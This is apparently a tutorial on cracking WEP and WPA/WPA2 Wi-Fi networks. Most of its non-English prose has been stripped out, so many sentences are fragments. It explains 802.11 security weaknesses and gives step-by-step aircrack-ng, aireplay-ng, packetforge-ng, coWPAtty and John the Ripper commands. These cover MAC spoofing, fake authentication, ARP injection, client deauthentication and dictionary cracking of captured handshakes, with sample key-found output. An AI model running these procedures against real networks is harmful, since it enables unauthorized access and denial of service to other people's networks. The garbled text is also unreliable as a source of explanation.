, Wi-Fi

Hacker , ,
, , Update server client.
patch critical , exploits , advisories
. , data loss.
' Hacker Cracker ,
Root Admin , ban

ADMHN


0_. qubix
1. 802.1
1.1. 802.1
1.2.
2.
2.1.
2.2.
a) symmetric key cryptography
b) hash algorithms
c) asymmetric key cryptography
3.
4. To WEP
4.1. ' WEP
4.2. WEP
4.3. WEP;
a) authentication
b) integrity protection
c) IVs
5. The empire strikes back - To WPA
5.1. WPA / WEP
5.2. 4-way handshake
6. WPA2 total recall
7.
7.1.Deauthentication
7.2.Fake authentication
7.3.Interactive packet replay
7.4.ARP request replay
7.5.KoreK chopchop
7.6.Fragmentation attack
7.7.Caffe-latte attack
8. hardware
8.1.aircrack-ng suite
8.2.kismet
8.3.wireshark
8.4.cowpatty
8.5.john the ripper
8.6.backtrack
8.7. hardware
9. WEP cracking
10.WEP cracking revisited
11. ...
12. WPA cracking
12.1. Recon Kismet
12.2. Passive Attack
12.3. Active Attack
12.4. Four-way Handshake
12.5. Crack
12.6. Crack
13. ...
14.

0_. qubix
3 :
- ,
copy paste *
-To crackers
wifi
*) , !

1. 802.1
802.1;
802.1 802.1 .
(authentication)

(supplicant) o , authenticator
( access point - AP) authentication server ( RADIUS server) .
To 802.1, wireless ,
supplicant authentication server. authenticator
, wireless access points
/ . servers, APs ,
. Access Point authentication server.
802.1 , EAP
(Extensible Authentication Protocol)
, PPP(Point-to-Point Protocol - DSL
authentication PPPoE -PPPover Ethernet-) LAN PoL (EAP
over LAN) EAP-TLS, PEAP, Kerberos V5
802.1 .

, 802.11 legacy 1997
.
2.4Ghz ( 900hz
GSM) data rate 1 2 Mbit/s .
2.4Ghz , 1999 802.11a
5Ghz, data rate
54bit/s. 5Ghz
2.4Ghz, ,
802.11a .
T 802.11b, data
rate 11bit/s. H data rate
(modulation - DSSS).
, wireless ,

(2.4Ghz) bluetooth, ,
2003, 802.11g 2.4Ghz
802.11a. 54bit/s data rate
hardware 802.11b 802.11a
21%. data rate, hardware
3 (dual-band -2.4 & 5Ghz, tri-mode -802.11a &
802.11b/g).
[]

 2.4Ghz, .11b
2004 802.11i wireless ,
WEP, , WPA.
(c-f, h, j) .
802.11n, MIMO
(Multiple In-Multiple Out), , 2,3 4
, data streams
. 600bit/s bitrate
2.4 5Ghz 802.11a/g (OFD - Orthogonal
frequency-division multiplexing).

2.

(plaintext cleartext)
(cipher)
(key) ,
.
(ciphertext).

2 , (symmetric-key cryptography)
(public-key cryptography).
Symmetric-key cryptography

.

, block ciphers stream ciphers.

block ciphers plaintext, key
ciphertext . plaintext
plaintext ,
ciphertext .
(modes of operation). block
ciphers DES (data encryption standard) AES (advanced encryption standard).
stream ciphers (keystream)
plaintext bit-by-bit , ciphertext []

, ,
cipher plaintext. stream cipher RC4,
SSL, RDP, SASL, Kerberos, TLS WEP WPA.
hash, plaintext
plaintext .
hash MD5 SHA.
public-key cryptography ( asymmetric-key)
symmetric-key ,
, key ciphertext
.
.
public-key keys, private
ciphertext public plaintext.
,
. asymmetric key DSA, RSA, ElGamal o
PGP OpenPGP.

public-key (digital signature)

( mail) , private key
( hash ) ,
public key
.
SSL/TLS, VPNs.

3.
,
...
AP (Access Point), Wi-Fi

Ad Hoc (Mode)
, AP
ARP (Address Resolution Protocol), IP MAC.
Association
( authentication)
[]

 Authentication (supplicant),
.
Authenticator
( AP).
Beacon AP
ESSID, MAC address
BSSID (Basic Service Set Identifier), MAC access point.
CCMP (Counter-Mode / Cipher Block Chaining Message Authentication Code Protocol),
WPA2, AES block cipher.
Channel , 1hz 5Mhz
Wi-Fi .
CRC (Cyclic Redundancy Check), pseudo-integrity
.
Dictionary ( xP) bruteforce attack
Dynamic WEP WEP : broadcast key
( shared key ) session key authenticated
supplicant. .
EAP (Extensible Authentication Protocol),
authentication.
EAPOL (EAP Over LAN), EAP .
ESSID (Extended Service Set Identifier),
Fragmentation
.
Frame frame packet. O
layer 2 OSI model frames,
3 layer packets ( OSI model )
GEK (Group Encryption Key), multicast traffic (
-integrity- CCMP).
GIK (Group Integrity Key), multicast traffic (TKIP).
GMK (Group Master Key), group key hierarchy.
GTK (Group Transient Key), GMK.
Handshake - supplicant
ICV (Integrity Check Value), data field plaintext
( CRC32 ).
Infrastructure (Mode) AP
.
IP address (Internet Protocol address)
.
IV (Initialization Vector), encryption key
keystream.
KCK (Key Confirmation Key), handshake.
KEK (Key Encryption Key), handshake .
MAC address (Media Access Control address), 48-bit
.
MIC (Message Integrity Code), data field plaintext
( Michael).
MK (Master Key), supplicant authenticator
authentication 802.1x.
Monitor Mode wifi
wifi . raw mode.
MPDU (Mac Protocol Data Unit), fragmentation.
MSDU (Mac Service Data Unit), fragmentation.
PAE (Port Access Entity), 802.1x.
packet () ()
. ,
"" .
[]

 PMK (Pairwise Master Key), pairwise key.

PRGA (Pseudo Random Generation Algorithm) keystream RC4.
ciphertext plaintext = PRGA
PSK (Pre-Shared Key), (passphrase) PMK
WPA-PSK mode.
PTK (Pairwise Transient Key), PMK.
Rainbow tables hashes bruteforce/dictionary attacks
RSN (Robust Security Network), 802.11i (TKIP, CCMP etc.).
RSNA (Robust Security Network Association), RSN,
4-way handshake.
RSN IE (Robust Security Network Information Element), RSN
Probe Response Association Request.
Sniffing
Spoofing attacker .
mac spoofing mac address client, arp spoofing

SSID (Service Set Identifier), wireless network identifier ( ES-SID).
STA (Station), .
TK (Temporary Key), unicast traffic (
-integrity checking- CCMP).
TKIP (Temporal Key Integrity Protocol), WPA
RC4 ( WEP).
TMK (Temporary MIC Key), data integrity unicast traffic (TKIP).
TSC (TKIP Sequence Counter), replay counter TKIP.
TSN (Transitional Security Network), -802.11i (WEP .).
WEP (Wired Equivalent Privacy), default 802.11
.
Wi-Fi (Wireless Fidelity),
WPA (Wireless Protected Access), 802.11i ,
TKIP.
WRAP (Wireless Robust Authenticated Protocol),
WPA2.

4. WEP
' WEP
To WEP wireless 1999.
RC4 CRC32 integrity checking.
, ,
40-bit ,
104-bit . WEP
WPA/WPA2,
. , routers .

WEP
-
WEP . 24-bit V (K)
RC4 plaintext (P) checksum
(ICV), ciphertext (C):

C = [ P || ICV(P) ] [ RC4(K || IV) ]

XOR || R

[]

 , :

plaintext , RC4 keystream

IV shared key. To XOR plaintext
ICV ( CRC32 plaintext) ciphertext
IV key ID frame.
(header) plaintext bssid, IV
destination address. To , ICV, LLC o subnetwork
access protocol header.

802.11 header
BSS ID

Initializationvector(IV)

Destinationaddress

(unencrypted)
LogicalLinkControl
SubnetworkAccess ProtocolHeader
Data
IntegrityCheckValue

Authentication

WEP authentication (open authentication

method) (shared key authentication).
, supplicant AP
, . association
authenticator. association, WEP .
(four-way handshake) :
1. client authentication request P
2. To AP plaintext (challenge)
3. O client plaintext challenge WEP key
authentication request
[]
4. To AP plaintext challenge .

 association, .
2
capture four-way handshake WEP key , .

WEP;
Authentication ()

, supplicant AP,
.
key.
attacker
.
client P,
attacker, client, mac address .
key (
key AP),
client ( )
key. AP.
H .
WEP, : C=PR XOR, C
ciphertext, P plaintext ICV (P||ICV(P)) R
key IV RC4 (RC4(key||IV)). C
P, R C, P. O
IVs WEP IV client,
attacker, o R .

Integrity protection
To 2001 Borisov, Goldberg Wagner CRC CRC
bit-flipping attack. O CRC CV plaintext,
.
ICV plaintext ,
. CRC
, XOR.
: CRC(X Y) = CRC(X) CRC(Y).
(flip) bits plaintext
ICV (forged packet), P
router.
WEP
. WEP
, ! WEP ...
. , , bit-flipping,
.
[]

 IVs
stream cipher plaintext
(keystream) . WEP IVs.
IV (24bits) IVs 17.
IV
. AP 11Mbps 1500 ,
IVs 5 :

1,500 bytes x (8 bits/byte) X 224 = 18.300 secs ~ 5h

11x106 bits/sec
5 , IVs keystreams.
,
IVs ,
IVs. shared key,
keystreams .
,
keystream.
H WEP RC4 cipher. To 2001 Fluhrer, Mantin
Shamir (FMS attack) Key Scheduling algorithm
PRGA (keystream) XOR plaintext.
, RC4 keystreams bytes
bits shared key . keystreams
OR shared key IVs, IVs (weak IVs). ,
weak IV , attacker bits shared key bytes . M
IV, shared key.

5. The empire strikes back WPA

WPA / WEP
WEP , Wi-Fi alliance
, Wireless Protected Access. To WPA
, TKIP
CCMP WPA2.
O TKIP (2003) 802.11i (2004)
WEP. key
IV , IV 48bits 24.
key attacks byte plaintext byte key IV,
WEP byte plaintext byte key XOR
. , ICV CRC32,
64bit (C) . replay attacks,
(TSC) .
TKIP hardware WEP
drivers firmware updates, RC4 stream cipher
ICV .
authentication server (aka WPA-enterprise),
WPA-PSK. RADIUS authentication servers,
router , PSK mode.
[]

 , chopchop
WPA protected , , key
bruteforce dictionary based attacks 4-way handshake.
4-way handshake
WPA. To 802.11i RSN
4-way handshake supplicant authenticator, RSNA.
4 RSN(A) :

802.1X

RSN(A) &
4-way handshake ( 3 bullet 2
authentication server) :
PMK (*)
PTK
cipher
GTK

*) WPA-PSK mode, PMK = PSK.

H PTK :
PTK = PRF-X (PMK, Paiwise key expansion, Min(AP_Mac, STA_Mac) || Max (AP_Mac, STA_Mac)
|| Min (ANonce, SNonce) || Max (ANonce, Snonce))

.. :
PRF-X: Pseudo Random Function
Anonce: AP
SNonce: o
STA_mac,AP_mac: mac addresses AP
PTK KCK (Key Confirmation Key), KEK
(Key Encryption Key) TK (Temporary Key). KCK MIC.
H PTK, , .
RSN ,
, WEP.
, 4-way handshake.

6. WPA2 total recall

WPA2 WEP. TKIP,
CCMP, AES block cipher, RC4
. ' ,
802.11i standard,
.
WPA, WPA2 , authentication server (WPA2
enterprise) pre-shared key (WPA2-PSK).
[]

7.
Deauthentication
deuthentication clients
(reauthenticate).
clients DoS (Queensland DoS).
:

(hidden cloacked) AP, AP broadcast ESSID .

WPA/WPA2 handshakes clients reauthentication
ARP
MAC address spoofing

Fake authentication
clients associated
MAC adress. WEP association
AP. ARP AP WPA/WPA2.

Interactive packet replay/package injection

O AP IV
. , (inject)
P , IV .
, AP,
.
(natural),
1) broadcast MAC address (FF:FF:FF:FF:FF) - ARP 2) wireless client , DS (distribution
system) bit 1
,
(package forgery).

ARP request replay/ARP Injection

IVs AP. ,
package injection .
ARP .
AP , IV. To
attacker AP , IV .
, WEP key.

KoreK chopchop
, WEP
key, WEP key, plaintext PRGA
.
:
1)
2) byte (chop off)
3) 0,
4) AP
5) byte 1
256 , []

 AP
6) byte

oreK bit-flipping CRC32
ICV choped off ICV
.

Fragmentation attack
1500 bytes PRGA,
injection attacks. ,
PRGA ,
RPGA .
fragmentation attack ( AP,
relay) .


, 8 bytes
802.11 LLC/SNAP header. 3 bytes
: AA, AA, 03 frame (
frame ). 3 bytes 00,00,00 IP
2 bytes. 2 bytes , IP ARP.
byte 08, IP ARP
, ARP 36 54 bits.
:
byte.

0xAA

0xAA

0x03

--- DSAP--- ---SSAP--- ---CTRL---

0x00

0x00

0x00

--------ORG code-------

0x08
--Ether

??
type--

, C=PR 8 bytes ( 8 bytes plaintext)

8 ciphered bytes , XOR
8 bytes R(=RPGA)! .
,

P ,
. To (fragmentation) ( 802.11
) WEP MAC layer*. 802.11 specification,
MAC layer 16 4bytes
keystream.
8 bytes RPGA (
4 ),
IP 28 bytes (8 bytes LLC/SNAP
header+20bytes IP header) ICV .
4bytes, fragment
WEP 4*16=64bytes(-28 )
.
36bytes . 1500 bytes RPGA
fragmentation.
*) sublayer data-link layer OSI network model

[]

 ARP
. ARP
. ..1500bytes
P . ,
ARP .
bytes .
. IV ,
bit-flipping
WEP ...

Caffe-latte attack
attacker P
. caffe-latte , laptop
, cached WEP keys
attacker !
SSID spoofing evil twin/honeypot attacks
AP
clients wi-fi hotspots . attacker
AP ESSID connex
laptop WEP key man-in-the-middle
. attacker WEP key
. , ;
ARP pc
ip address. client ,
ip address .
ip . attacker
ARP requests . ARP
bit-flipping integrity checking WEP, P
MAC address header gratuitous ARP ,
ARP request .
o attacker , ARP
request, ip - -
. attacker WEP key.

8. hardware
X software
Aircrack-ng suite
wifi crackers, ,
mass deauthentication. :

aireplay-ng
, wifi
package injection.

:
aireplay-ng <> <replay interface>

Filter options:

-b bssid : MAC address, Access Point

-d dmac : MAC address, Destination ()
-s smac : MAC address, Source ()

[]

-m
-n
-u
-v
-t
-f
-w

len :
len :
type : frame control, type field
subt : frame control, subtype field
tods : frame control, To DS bit
fromds : frame control, From DS bit
iswep : frame control, WEP bit

package injection

-x
-p
-a
-c
-h
-e
-j
-g
-k
-l
-o
-q
-y

nbpps : number of packets per second

fctrl : frame control word (hex)
bssid : Access Point MAC address
dmac : Destination MAC address
smac : Source MAC address
essid : fakeauth attack : AP SSID authentication
: arpreplay attack : inject FromDS
value : ring buffer (default: 8)
IP : destination IP in fragments
IP : source IP in fragments
npckts : number of packets per burst (-1)
sec : keep-alives, dynamic wep (-1)
prga : keystream shared key authentication

Attack modes, aireplay ( ):

- -deauth count : deauthenticate 1 stations (-0)

- -fakeauth delay : fake authentication AP (-1)
- -interactive : interactive frame selection (-2)
- -arpreplay : ARP-request replay (-3)
- -chopchop : decrypt/chopchop WEP packet (-4)
- -fragment : keystream (-5)
- -test : injection test (-9)

:
aireplay -1 0 e [ Essid ] -a [ Bssid AP] b [ bssid AP] h [ bssid station ] [ interface ]
-1 = fakeauth
0 = delay AP
-e = AP authentication
-a = mac AP injection
-b = mac P
-h = mac
interface = wlan interface , ath0

airmon-ng
airmon monitor mode

:
airmon-ng <start|stop> <interface> [channel]
:

<start|stop> start stop interface. ()

<interface> interface. ()
[channel] .

[]

airodump-ng
airodump raw . ,
AP GPS,

:
airodump-ng <options> <interface>[,<interface>,...]
:
--ivs

: IVs

--gpsd
--write
-w
--beacons
--update
--showack
-h
-f
--berlin

:
<prefix> :
:
:
<secs> :
:
:
<msecs> :
<secs> :

GPSd
prefix
--write
beacons dump file
secs
ack/cts/rts
stations --showack
channel ms
AP/client
(Default: 120 seconds).
<file> : file

-r
Filter options:
--encrypt
<suite>
--netmask <netmask>
--bssid
<bssid>
-a

:
:
:
:

APs cipher
APs mask
APs BSSID
unassociated clients

' airodump-ng 2.4Ghz.

/ :
--channel <channels>:
--band <abg>
: airodump-ng
--cswitch <method> :
0
: FIFO (default)
1
: Round Robin
2
: Hop on last
-s
: --cswitch
--help

aircrack-ng
aircrack cracking WEP WPA/WPA2-PSK eys.
WEP , PTW (Pyshkin, Tews, Weinmann) FMS/KoreK.
PTW
Andreas Klein (2005) o
RC4 keystreams Key FMS. ARP
.
FMS/KoreK WEP key:

FMS ( Fluhrer, Mantin, Shamir) attacks - statistical techniques

Korek attacks - statistical techniques
brute force

WPA/WPA2 .
WPA/WPA2 shared key 4-way handshake client
AP dictionary attack handshake .

:
aircrack-ng [options] <capture file(s)>
[]

Options:
option

-a

amode

Force attack mode (1 = static WEP, 2 = WPA/WPA2-PSK).

-e

essid

If set, all IVs from networks with the same ESSID will be used. This option is also required
for WPA/WPA2-PSK cracking if the ESSID is not broadcasted (hidden).

-b

bssid

Select the target network based on the access point's MAC address.

-p

nbcpu

On SMP systems: # of CPU to use. This option is invalid on non-SMP systems.

-q

none

Enable quiet mode (no status output until the key is found, or not).

-c

none

(WEP) Restrict the search space to alpha-numeric characters only (020 - 0x7F).

-t

none

(WEP) Restrict the search space to binary coded decimal hex characters.

-h

none

(WEP) Restrict the search space to numeric characters (030-039) These keys are used by
default in most Fritz!BOXes.

-d

start

(WEP) Set the beginning of the WEP key (in hex), for debugging purposes.

-m

maddr

(WEP) MAC address to filter WEP data packets. Alternatively, specify -m ff:ff:ff:ff:ff:ff to
use all and every IVs, regardless of the network.

-n

nbits

(WEP) Specify the length of the key: 64 for 40-bit WEP, 128 for 104-bit WEP, etc. The
default value is 128.

-i

index

(WEP) Only keep the IVs that have this key index (1 to 4). The default behaviour is to
ignore the key index.

-f

fudge

(WEP) By default, this parameter is set to 2 for 104-bit WEP and to 5 for 40-bit WEP.
Specify a higher value to increase the bruteforce level: cracking will take more time, but
with a higher likelyhood of success.

-k

korek

(WEP) There are 17 korek statistical attacks. Sometimes one attack creates a huge false
positive that prevents the key from being found, even with lots of IVs. Try -k 1, -k 2, -k
17 to disable each attack selectively.

-x/-x0

none

(WEP) Disable last keybytes brutforce.

-x1

none

(WEP) Enable last keybyte bruteforcing (default).

-x2

none

(WEP) Enable last two keybytes bruteforcing.

-X

none

(WEP) Disable bruteforce multithreading (SMP only).

-y

none

(WEP) This is an experimental single bruteforce attack which should only be used when the
standard attack mode fails with more than one million IVs

-w

words

(WPA) Path to a wordlist or - without the quotes for standard in (stdin).

-z

none

Invokes the PTW WEP cracking method.

aircrack:
KB = Keybyte
depth =
byte = byte key IVs
vote = byte

:
aircrack-ng -w h:hex.txt,ascii.txt -a 1 -n 64 -e apname wep10-01.cap
(wep dictionary attack)
[]

-w h:hex.txt,ascii.txt = dictionaries ( h:
hex values)
-a 1 = WEP
-n 64 = 64bit
-e apname = AP (-b mac address )
wep10-01.cap =

packetforge-ng
O packetforge
injection. ARP requests,
UDP, ICMP custom . ARP request injection.
Forge options:
-p <fctrl> : set frame control word (hex)
-a <bssid> : set Access Point MAC address
-c <dmac> : set Destination MAC address
-h <smac> : set Source MAC address
-j : set FromDS bit
-o : clear ToDS bit
-e : disables WEP encryption
-k <ip[:port]> : set Destination IP [Port]
-l <ip[:port]> : set Source IP [Port] (Dash lowercase letter L)
-t ttl : set Time To Live
-w <file> : write packet to this pcap file
Modes (long modes use double dashes):
arp : forge an ARP packet (-0)
udp : forge an UDP packet (-1)
icmp : forge an ICMP packet (-2)
null : build a null packet (-3)
custom : build a custom packet (-9)

Kismet
Kismet (sniffing), intrusion
detection 802.11 wireless .
:

Wireshark/Tcpdump
Airsnort weak-iv packets
IP
channel hopping multicard split channel hopping
SSID

Client/Server client kismet server
/ APs clients
AP default
WEP packets realtime
Named pipe Snort
, Kismet instance
instances (remote drones)
XML output
20

, Kismet , , ,
APs clients .
, (channel hopping)
. ,
GPS.
[]

 server/drone/client , drones , server

clients .
Unix, Linux, Mac Os X (KisMAC), *BSDs windoze ( )
:

Wardriving: Mobile detection of wireless networks, logging and mapping of network location, WEP,
etc.
Site survey: Monitoring and graphing signal strength and location.
Distributed IDS: Multiple Remote Drone sniffers distributed throughout an installation monitored by a
single server, possibly combined with a layer3 IDS like Snort.
Rogue AP Detection: Stationary or mobile sniffers to enforce site policy against rogue access points.

Kismet :
Interface:
- Name : SSID
- T : T
- W :
- Ch : AP
- Packts :
- Flags : IP (. A4 ARP )
- IP Range : IP
- Size : AP
:
W Y (Yes) WEP,
O (Other) (WPA/TKIP/LEAP/EAP/TLS). O ,
(Information) Encrypt
.
:
Kismet , .
:
- :
- : , factory default
- :
- :
:
- A Access Point
- H (Ad-Hoc) - ad-hoc point-to-point wireless
- P (Probe request) client ,
- D (Data) - Data network
- T (Turbocell) - Turbocell network
- G (Group) - Group ( )
:
e popup kismet servers

z - Zoom
m ( config)
t
g
u group
[]

c popup clients
n group
i
s
l - signal/power/noise
r
a
p
f
w alerts warnings.

Wireshark
To wireshark ( ethereal)
, . ,
Pcap / . monitor mode (
promiscuous mode ethernet)
:
Windows, Linux, OS X, Solaris, FreeBSD, NetBSD

Live ( format)
Gui cli (TTY-mode TShark)
VoIP
capture formats: tcpdump (libpcap), Pcap NG, Catapult DCT2000, Cisco Secure
IDS iplog, Microsoft Network Monitor, Network General Sniffer, Sniffer Pro, and NetXray, Network
Instruments Observer, NetScreen snoop, Novell LANalyzer, RADCOM WAN/LAN Analyzer,
Shomiti/Finisar Surveyor, Tektronix K12xx, Visual Networks Visual UpTime, WildPackets
EtherPeek/TokenPeek/AiroPeek, .
/ Ethernet, IEEE 802.11, PPP/HDLC, ATM, Bluetooth,
USB, Token Ring, Frame Relay, FDDI
IPsec, ISAKMP, Kerberos, SNMPv3,
SSL/TLS, WEP WPA/WPA2

Output XML, PostScript, CSV

wireshark iv packets, EAPOL

WPA handshakes, QoS packets, ARPs
:
http://www.wireshark.org

coWPAtty
To coWPAtty bruteforce dictionary attack,
WPA/WPA2 handshakes.
Usage: cowpatty [options]
-f
-r
-s
-h
-v
-V

Dictionary file
Packet capture file
Network SSID
Print this help information and exit
Print verbose information (more -v for more verbosity)
Print program version and exit

[]

John the ripper

password cracking . 15(!!) ,
. DES,
MD5, Blowfish, Kerberos AFS, WinNT/2000/XP LM hashes. plugins MD4, LDAP
passwords, mysql .
dictionary/bruteforce attacks.
rules ,
0, i 1, a @ . coWPAtty output
dictionary JtR rules dictionary:
john -wordlist=all.lst -rules -stdout | cowpatty -r wpapsk.dump -s "linksys" -

: http://www.openwall.com/john/

Backrack
To Backrack live Linux, Slackware
penetration testing ( 300).
patched drivers , -
.
:

http://www.remote-exploit.org/backtrack.html
documentation:

http://wiki.remote-exploit.org

hardware
aircrack-ng . , wireless
chips :
chipset

driver

atheros

madwifi

Broadcom

bcm43xx

b43

b43

Centrino a/b/g

ipw2915/3945

ipw2915 uses ipw2200 driver

Centrino a/g/n (5xxx)

4965AGN

Prism2/3

HostAP/wlan-ng

PrismGT FullMAC

prism54

Ralink

Rt2x00,RT2570USB, rt2500, rt2570, rt61, rt73

RT73USB

RTL8185

mac80211

RTL8187B/RTL8197

RTL8187

RTL8187L

Rtl8187,rtl8187b

TI (ACX100/ACX111)

ACX100/ACX111

[]

 drivers patching.
atheros chip SMC-EZconnect & Ezconnect2, Level One wc-0300, Netgear WAG511, D-Link DWL-G550,
Thinkpad 11a/b/g
:

http://www.aircrack-ng.org/doku.php?id=compatibility_drivers

9.WEP cracking
Injection attack
,
, WEP key
. chip atheros.
1) monitor mode [1]

modprobe ath_pci
modprobe ipwraw
2) mac address ( interface)

iwconfig
airmon-ng stop ath0
ifconfig wifi0 down
macchanger mac 00:11:22:33:44:66 wifi0
3) interface monitor mode

airmon-ng start wifi0

4) APs

airodump-ng ath0
P :
ESSID: connex
mac: 00:21:21:21:21:21
channel: 6
5)

airodump-ng -c 6 -w network.out bssid 00:21:21:21:21:21 ath0

-c = AP
-w = (network.out prefix ,
network.out-01, -02, -03 )
--bssid = mac AP
ath0 = wireless interface
6) fake association AP, (*)

aireplay-ng -1 0 -a 00:21:21:21:21:21 -h 00:11:22:33:44:66 -e connex ath0

:Association successful :-)
-1 = fake authentication (0 = delay AP)
-a = mac AP

[]

-h = mac
-e = essid P
ath0 = interface
7) AP

aireplay-ng -3 -b 00:21:21:21:21:21 -h 00:11:22:33:44:66 ath0

-3 = arp replay attack
-b = mac AP
-h = macchanger
ath0 = wireless interface
, :

aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 00:21:21:21:21:21 -h 00:11:22:33:44:66 ath0

AP
-2 = interactive packet replay
-p 0841 = Frame Control
wireless client
-c = destination mac address broadcast
AP, IV !
-b = mac AP
-h = macchanger
8) WEP key

aircrack-ng -n 128 -b 00:21:21:21:21:21 network.out-01.cap

-n 128 = WEP
-b = mac AP
network.out-01.cap = (5)
*) ( ) AP,
client . 6 7
.

10.WEP cracking revisited

Fragmentation attack
clients
fragmentation attack. O RPGA
ARP request access point
, .

1) APs
airodump-ng ath0

AP channel = 7
[]

2) monitor mode 7
airmon-ng stop ath0
airmon-ng start wifi0 7

3) association AP
aireplay-ng -1 0 -e [ AP] -a [mac P] -h [mac ] ath0

-1 = Fake authentication AP
-e = essid ( AP)
-a = Mac address AP (bssid)
-h = mac address (source)
* Atheros chipsets MAC address

4) keystream aireplay-ng
aireplay-ng -5 -b [mac AP] -h [mac ] ath0

-5 = fragment: keystream
-b = AP mac address (bssid)
-h = mac address (source)
ath0 = wireless interface extension
5) ARP request packetforge-ng
packetforge-ng -0 -a [mac AP] -h [mac ] -k 255.255.255.255 -l
255.255.255.255.255 -y fragment-0206-131211.xor -w arp-request

-0 = ARP
-a = bssid
-h = mac
-k = set Destination IP
-l = set Source IP
-y = PRGA ( (4) )
-w = pcap
6) airodump-ng
airodump-ng -c 7 --bssid [mac AP] -w wep ath0

-c = AP
-bssid = mac AP
-w = date
ath0 = wireless interface extension

7) inject
aireplay-ng -2 -r arp-request ath0

-2 = interactive frame selection (injection)

-r = ( (5) )

[]

8) WEP key
aircrack-ng -P 2 -b 00:18:F6:AC:11:13 wep*.cap

-P = PTW debug mode

2 = PTW (Pyshkin/Tews/Weinmann)
-b = bssid AP

11. ...
traffic
, IVs .
injection AP
.

MAC Address filtering

injection, fake authentication AP ,
mac address clients mac addresses
.
airodump clients mac
, AP. client
deauthentication .
-m aircrack mac address

IVs,
keys
: -k N ( =1..17) -y. (. Aircrack )
fudge factor (-f) . default 2 ,
,
.

,
AP :P

12.WPA cracking
, , kismet
reconing, wireshark packet filtering, coWPAtty JtR dictionary attacks.
:
http://www.smallnetbuilder.com/content/view/30278/98/1/1/

...
!

Recon Kismet
Kismet (Backtrack > Radio Network Analysis > 80211 > Analyzer). H version 3
wizzard wireless interface ( ). []

 ,
/usr/local/etc/kismet.conf interface:
:
/usr/local/etc/kismet.conf -- Line 25:source=madwifing_g,wifi0,kis0

Kismet :
bt ~ # kismet
kismet , .
raw packets,
PSK, client AP.
interface.
.
kismet, h help menu
.
, ,
, default . W : None
("W"), WEP ("Y"), WPA ("O" Other). H Ch AP.
Pacts Kismet AP.
.
clients AP,
handshake .
kismet autofit mode,
. highlight
enter. .
encryption scheme, BSSID clients AP.
c kismet clients.
clients Established ("E") To DS ("T") ( T ).

Passive Attack
, kismet,
, , kismet
. airodump-ng, kismet
, .
four-way handshake, airodump-ng ,
.
passive WPA-PSK attack :

Kismet
(: channel, "s" "c")
(highlight AP "L")
handshake

Active Attack
Kismet,
associated clients AP .
, deauthentication packets,
[]

 . four-way
handshake.
. association
( )
AP ,
monitor mode.
- VAP (Virtual Access Point):
airmon-ng stop ath0 ( atheros)

- , monitor mode
airmon-ng start wifi0

deauthentication client authentication

. terminal windows.
airodump-ng
handshake ( kismet):
:
airodump-ng -w capture_file_prefix --channel channel_number interface

:
airodump-ng -w cap --channel 6 ath0

terminal deauthentication attack aireplay-ng:

:
aireplay-ng --deauth 1 -a MAC_of_AP -c MAC_of_client interface

:
aireplay-ng --deauth 1 -a 00:18:E7:02:4C:E6 -c 00:13:CE:21:54:14 ath0

, client AP ()
(reauthentication). Kismet
deauthentication floods,
, , .
, airodump-ng
reauthentication event.

Four-way Handshake
authentication handshake,
Wireshark,
WPA handshake.
Wireshark (Backtrack > Privilege Escalation > Sniffers)
Kismet (Kismet-<date>.dump). H WPA four-way handshake Extensible Authentication
Protocol over LAN (EAPoL). Wireshark EAPoL , []

 eapol [filter].
, client-AP-client-AP. handshake,
.

Crack
Wi-Fi Alliance WPA-PSK.
() bruteforce attacks,
...6 ( 948
6 1015). pc 35 hashes ,
...5 hash table 8 .
.
. hash (salted) SSID AP, hash
table 5 , APs
SSID. WPA key brutforce ...
, passphrases
, hashes
. dictionary attack.
To BackTrack 2 , , ,
, ( passwords ).
Backtrack ,
.
, dictionary attack
WPA handshake aircrack-ng, coWPAtty. aircrackng .
coWPAtty hashes .
aircrack-ng attack

aircrack-ng -e AP_SID -w dictionary_file capture_file

(BackTrack v3):
aircrack-ng -e snb -w /pentest/wireless/cowpatty-4.0/dict Kismet-Jan-15-2008-1.dump
Aircrack-ng 0.8
[00:00:00] 2 keys tested (37.20 k/s)
KEY FOUND! [ 12345678 ]
Master Key

: CD 69 0D 11 8E AC AA C5 C5 EC BB 59 85 7D 49 3E
B8 A6 13 C5 4A 72 82 38 ED C3 7E 2C 59 5E AB FD

Transcient Key : 06
CE
FF
2B
EAPOL HMAC

F8
8A
1D
20

BB
9D
41
90

F3
A0
E1
8C

B1
FC
65
EA

55
ED
17
32

AE
A6
93
15

EE
DE
0E
A6

1F
70
64
26

66
84
32
62

AE
BA
BF
93

51
90
25
27

1F
83
50
66

F8
7E
D5
66

12
CD
4A
E0

98
40
5E
71

: 4E 27 D9 5B 00 91 53 57 88 9C 66 C8 B1 29 D1 CB

[]

 aircrack-ng hashes ,

coWPAtty
coWPAtty , :
/pentest/wireless/cowpatty-4.0. Then run:
:
./cowpatty -s AP_SID -f dictionary_file -r capture_file

:
./cowpatty -s snb -f dict -r Kismet-Jan-15-2008-1.dump

coWPAtty aircrack , updates 1000

.
coWPAtty hashes
WPA key. hash tables Rainbow Tables
crack,
hash table files .
, - hashes ,
hash WPA key ,
passphrase plaintext. WPA keys SSID,
AP's SSID hash
tables.
hash tables
. .. WiFi (Church of WiFi) hash tables 1000
SSID's passphrases.
hash table genpmk,
coWPAtty:
:
./genpmk -s AP_SID -f dictionary_file -d hash_output_file

:
./genpmk -s snb -f dict -d dict_hash

hash table, crack 1/1000 .

:
./cowpatty -s AP_SID -d hash_output_file -r capture_file

:
./cowpatty -s snb -d dict_hash -r Kismet-Jan-15-2008-1.dump

[]

 Crack
dictionary
. Passphrases dinosaur my wpa key coWPAtty
aircrack. dinosaur52 my Wp@ k3y;
dictionary bruteforce
, !
, ..
(*) (rules) cracking *NIX John the Ripper(JtR). ,
dictionary
input coWPAtty aircrack-ng on the fly. (*)
mangling (!!!)

dictionary attacks, passphrases

. coWPAtty aircrack-ng
8 .
mangling rules JtR
AP.
default mangling rules John, coWPAtty,
aircrack-ng. ( /usr/local/john-1.7.2 BackTrack v3, /pentest/password/john-1.7.2 v2):
coWPAtty:
./john --wordlist=password_list --rules --stdout
| cowpatty -s ssid -f - -r capture_file

aircrack-ng:
./john --wordlist=password_list --rules --stdout
| aircrack-ng -e ssid -w - capture_file

:
./john --wordlist=password.lst --rules --stdout
| aircrack-ng -e snb -w Kismet-Jan-15-2008-1.dump

John set ,
documented "regex-esque" .
, default rules dictionary.
john.conf
section [List.Rules:Wordlist] ( 262) :

$[0-9]$[0-9]
$[0-9]$[0-9]$[0-9]

999
dictionary ( dinosaur52 )

. 3 1
:
[]

sE3
sl1
sE3sl1

glid335 :
